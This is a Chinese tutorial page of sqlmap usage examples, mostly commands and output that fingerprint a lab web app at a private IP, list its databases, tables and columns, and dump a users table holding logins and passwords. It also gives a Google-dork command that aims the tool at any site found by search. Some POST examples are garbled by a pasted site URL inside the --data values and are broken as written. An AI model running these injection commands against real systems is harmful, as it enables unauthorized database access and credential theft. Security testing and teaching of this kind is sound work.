首页 > 代码库 > sqlmap 使用举例
sqlmap 使用举例
详细的请见:
http://drops.wooyun.org/tips/143
http://wenku.baidu.com/link?url=45xj6EVVWQjV8upwrBAMIqPP3xMcmi6Zh2pGe27sZ6TZbsBtPJ3QjuIIz672egOe96UCt6T3LuPmczJIUGECmcEQLDRQ3DhYE4qGUmRhDLK
1. 检测特定url一个参数的get:
python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -v 3 -f --banner
–flush-session #刷新当前目标的会话文件–fresh-queries #忽略在会话文件中存储的查询结果
-v 3 #显示检测过程中的payload
列出所有的库和表:
python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" --dump-all -v 0
python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner --users
python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner --dbs
available databases [2]:[*] information_schema[*] photoblog
python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner -D "photob
log" --tables
Database: photoblog[3 tables]+------------+| categories || pictures || users |+------------+
python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner -D "photob
log" -T "users" --columns
Database: photoblogTable: users[3 columns]+----------+--------------+| Column | Type |+----------+--------------+| id | mediumint(9) || login | varchar(50) || password | varchar(50) |+----------+--------------+
python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" --dump -D "photoblog"
-T "users" --columns
2. 检测特定url一个参数的post:
python sqlmap.py -u "http://192.168.118.138/cat.php" --data="http://www.mamicode.com/id=1" -v 3 -f --banner
当GET或POST的数据需要用其他字符分割测试参数的时候需要用到此参数。例子:python sqlmap.py -u "http://www.target.com/vuln.php" --data="http://www.mamicode.com/query=foobar;id=1" --param-del=";" -f --banner --dbs --users
3. 检测google搜索出的结果
python sqlmap.py -g "inurl:\".php?id=1\""
sqlmap 使用举例